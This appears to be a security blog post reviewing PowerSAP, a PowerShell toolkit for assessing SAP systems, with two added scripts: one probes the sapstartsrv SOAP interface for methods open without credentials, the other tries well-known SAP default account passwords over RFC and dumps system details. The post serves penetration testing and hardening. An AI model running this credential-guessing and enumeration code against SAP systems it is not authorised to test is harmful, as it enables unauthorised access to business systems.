PowerSAP: A PowerShell SAP Security Assessment Tool!

This post is about PowerSAP, a tool that was included in this year's BlackHat Arsenal. What I like about this tool is that it does not try to re-invent the wheel and yet keeps its source code open for all of us to see and understand. The author, @_Sn0rkY, is upfront about this and says so in the tool description itself.

What is PowerSAP?

PowerSAP is an open source PowerShell tool for running security assessments against SAP installations. The author describes it as a simple PowerShell re-implementation of popular and effective techniques from public tools such as Bizploit, several Metasploit auxiliary modules and Python scripts available on the Internet. Like Metasploit, the toolkit is a collection of separate scripts, one per technique, rather than a single monolithic program.

It runs on Microsoft Windows and depends on the SAP Connector for Microsoft .NET (NCo). These connectors are provided by SAP itself and allow applications and technologies outside SAP to integrate with SAP systems via open standards; in other words, they are the supported means of technical interoperability between SAP components and our own projects. PowerSAP simply uses NCo as its RFC client library. Because the connector includes native code, it ships as separate 32-bit and 64-bit builds, which matters for the install steps below.

Current PowerSAP features:

PowerSAP currently ships the following scripts:

Invoke-mgmt-con-soap.ps1: Recovers information and settings through the SAP Management Console SOAP interface (served by sapstartsrv). It does this by connecting to TCP port 50013 and sending SOAP requests. Note that 50013 is the HTTP port of instance 00; in general the port is 5<NN>13, where NN is the two-digit instance number, and which web methods answer without credentials depends on the profile parameter service/protectedwebmethods.

Invoke-RFC_PING.ps1: Calls the function module RFC_PING and the built-in Ping method of the .NET connector to check that the SAP system accepts RFC connections and logons.

Invoke-RFC_SYSTEM_INFO.ps1: Calls the function module RFC_SYSTEM_INFO and returns information such as the kernel release, the SAP release, the system ID and the host name of the application server.

Invoke-RFC_bruteforce.ps1: Calls RFC_PING with a list of well-known default accounts such as SAP*, DDIC, IDEADM, EARLYWATCH and SAPCPIC to brute force logons over the SAP RFC protocol. Failed RFC logons count toward the lock threshold set by login/fails_to_user_lock, so use this with care on systems you cannot afford to lock accounts on.

Invoke-SXPG_CALL_SYSTEM.ps1: Calls the SXPG_CALL_SYSTEM remote function module of an SAP system to execute OS commands on the application server through the external commands maintained in SM49. At the moment only a few predefined SM49 commands are supported.

Invoke-SXPG_STEP_XPG_START.ps1: Calls the SXPG_STEP_XPG_START remote function module of an SAP system to execute OS commands. At the moment only the whoami command is supported.

In addition to these scripts, the author has included an Invoke-skeleton.ps1 that you can use as a base for your own custom modules. Pretty decent tool, I must say.
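As an added example (my own code, not PowerSAP's), here is a small PowerShell script that does what Invoke-mgmt-con-soap.ps1 is described as doing: it posts SOAP requests to the sapstartsrv HTTP port of one instance and reports which SAPControl web methods answer without credentials. The host name, the instance number and the list of probed methods are assumptions to adjust for the target.

```powershell
# Added example, not part of PowerSAP: probe the SAP Management Console
# (sapstartsrv) SOAP interface of one instance and report which web methods
# answer without credentials.
[CmdletBinding()]
param(
    [string]$ComputerName = 'sapserver.example.local',   # assumption: target host
    [int]$Instance = 0                                   # instance 00 -> port 50013
)

# sapstartsrv serves SOAP over HTTP on port 5<NN>13, NN being the two-digit instance number.
function Get-SapControlPort {
    param([int]$Instance)
    [int]('5{0:D2}13' -f $Instance)
}

# SOAP envelope for a SAPControl method that takes no parameters.
function New-SapControlEnvelope {
    param([string]$Method)
@"
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="urn:SAPControl">
  <SOAP-ENV:Body><ns1:$Method/></SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"@
}

# Post one request and return the parsed response document.
function Invoke-SapControl {
    param([string]$ComputerName, [int]$Instance, [string]$Method)
    $uri = 'http://{0}:{1}/' -f $ComputerName, (Get-SapControlPort -Instance $Instance)
    $resp = Invoke-WebRequest -Uri $uri -Method Post -UseBasicParsing `
        -ContentType 'text/xml; charset=utf-8' `
        -Headers @{ SOAPAction = '""' } `
        -Body (New-SapControlEnvelope -Method $Method)
    [xml]$resp.Content
}

# Which methods are reachable anonymously is controlled by the profile parameter
# service/protectedwebmethods; this list is only a starting point (assumption).
$methods = 'GetProcessList', 'GetInstanceProperties', 'GetVersionInfo', 'ListLogFiles', 'GetEnvironment'

foreach ($m in $methods) {
    try {
        $xml = Invoke-SapControl -ComputerName $ComputerName -Instance $Instance -Method $m
        Write-Host ('[+] {0,-22} answered without credentials' -f $m) -ForegroundColor Green
        if ($m -eq 'GetProcessList') {
            # PowerShell's XML adapter drops namespace prefixes, so the reply can be walked directly.
            $xml.Envelope.Body.GetProcessListResponse.process.item |
                Select-Object name, textstatus, pid | Format-Table -AutoSize
        }
    } catch {
        # A protected method is refused with HTTP 401; Invoke-WebRequest turns that into an exception.
        Write-Host ('[-] {0,-22} refused: {1}' -f $m, $_.Exception.Message) -ForegroundColor Yellow
    }
}
```

Run it as .\Probe-SapControl.ps1 -ComputerName <host> -Instance <NN>. A green line for a method such as GetEnvironment or ListLogFiles is a finding in itself, since those expose profile values and log file names to anyone who can reach the port; the fix on the SAP side is tightening service/protectedwebmethods, not blocking the port for the tool alone.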

Install PowerSAP:

The first step is to get the SAP Connector for Microsoft .NET. Get it here. Next, pull the tool's Git repository from here. Copy sapnco.dll and sapnco_utils.dll into the NCo_x86 or NCo_x64 folder that matches the connector build you downloaded; the build you end up loading must match the bitness of the PowerShell host you run, because a 64-bit powershell.exe cannot load the x86 connector and vice versa. That is all the setup needed. You can now run the various tests by "invoking" the scripts from the checked-out Standalone folder.
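As an added example covering both the install steps and the RFC-based scripts above (the connector's Ping, RFC_SYSTEM_INFO and the default-credential check), here is a stand-alone PowerShell script of my own, not PowerSAP's code, that loads NCo from the folder matching the bitness of the running PowerShell host, then tries a short list of well-known default accounts and prints RFC_SYSTEM_INFO for the first one that logs on. The host, system number, client, the NCo folder layout and the credential list are assumptions.

```powershell
# Added example, not part of PowerSAP: load the SAP .NET Connector (NCo) from
# the folder matching the bitness of this PowerShell host, then use it for
# Ping, RFC_SYSTEM_INFO and a short default-credential check.
param(
    [string]$AppServerHost = 'sapserver.example.local',  # assumption: target host
    [string]$SystemNumber  = '00',                       # assumption: instance number
    [string]$Client        = '000',                      # assumption: client
    [string]$NCoRoot       = '.\NCo'                     # assumption: folder holding NCo_x86 and NCo_x64
)

# sapnco.dll is backed by the native sapnco_utils.dll, so a 64-bit powershell.exe needs
# the x64 build and a 32-bit one the x86 build. Putting the folder on PATH lets the
# native DLL be found next to the managed one.
$arch   = if ([IntPtr]::Size -eq 8) { 'NCo_x64' } else { 'NCo_x86' }
$ncoDir = (Resolve-Path (Join-Path $NCoRoot $arch)).Path
$env:PATH = "$ncoDir;$env:PATH"
Add-Type -Path (Join-Path $ncoDir 'sapnco.dll')

$P = [SAP.Middleware.Connector.RfcConfigParameters]

# Build an RFC destination for one user/password pair.
function New-SapDestination {
    param([string]$User, [string]$Password)
    $cfg = New-Object SAP.Middleware.Connector.RfcConfigParameters
    $cfg[$P::Name]          = "assess_$User"
    $cfg[$P::AppServerHost] = $AppServerHost
    $cfg[$P::SystemNumber]  = $SystemNumber
    $cfg[$P::Client]        = $Client
    $cfg[$P::User]          = $User
    $cfg[$P::Password]      = $Password
    $cfg[$P::Language]      = 'EN'
    [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfg)
}

# RFC_SYSTEM_INFO fills the RFCSI_EXPORT structure with release, host and OS details.
function Get-SapSystemInfo {
    param($Destination)
    $fn = $Destination.Repository.CreateFunction('RFC_SYSTEM_INFO')
    $fn.Invoke($Destination)
    $si = $fn.GetStructure('RFCSI_EXPORT')
    [pscustomobject]@{
        SystemId      = $si.GetString('RFCSYSID')
        Host          = $si.GetString('RFCHOST')
        SapRelease    = $si.GetString('RFCSAPRL')
        KernelRelease = $si.GetString('RFCKERNRL')
        OS            = $si.GetString('RFCOPSYS')
        DbHost        = $si.GetString('RFCDBHOST')
    }
}

# .NET method exceptions reach a PowerShell catch block wrapped in MethodInvocationException;
# unwrap to get at the NCo exception type (RfcLogonException vs RfcCommunicationException).
function Get-InnerException {
    param($ErrorRecord)
    $ex = $ErrorRecord.Exception
    while ($ex -is [System.Management.Automation.MethodInvocationException] -and $ex.InnerException) {
        $ex = $ex.InnerException
    }
    $ex
}

# Constructed list of well-known default accounts (assumption: adjust for the engagement).
# Every failed logon counts toward login/fails_to_user_lock, so keep the list short.
$defaults = @(
    @{ User = 'SAP*';       Password = '06071992' },
    @{ User = 'DDIC';       Password = '19920706' },
    @{ User = 'EARLYWATCH'; Password = 'SUPPORT'  },
    @{ User = 'SAPCPIC';    Password = 'ADMIN'    }
)

:creds foreach ($c in $defaults) {
    try {
        $dest = New-SapDestination -User $c.User -Password $c.Password
        $dest.Ping()      # NCo's built-in ping: opens a connection and logs on
        Write-Host ('[+] {0} / {1} accepted' -f $c.User, $c.Password) -ForegroundColor Green
        Get-SapSystemInfo -Destination $dest | Format-List
        break creds       # one valid account is enough for the assessment
    } catch {
        $ex = Get-InnerException $_
        switch ($ex.GetType().Name) {
            'RfcLogonException'         { Write-Host ('[-] {0}: logon refused' -f $c.User) -ForegroundColor Yellow }
            'RfcCommunicationException' { Write-Host ('[!] cannot reach {0}: {1}' -f $AppServerHost, $ex.Message) -ForegroundColor Red; break creds }
            default                     { Write-Host ('[!] {0}: {1}' -f $c.User, $ex.Message) -ForegroundColor Red }
        }
    }
}
```

Two points worth noting from the error handling: a communication exception means the gateway or dispatcher is unreachable, so further attempts would only waste time, while a logon exception is a real answer from the system and is what burns the login/fails_to_user_lock counter. Also, NCo 3.0 is published in builds for different .NET runtimes; pick the one matching the CLR of the PowerShell you run, or Add-Type will fail before any SAP traffic is sent.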
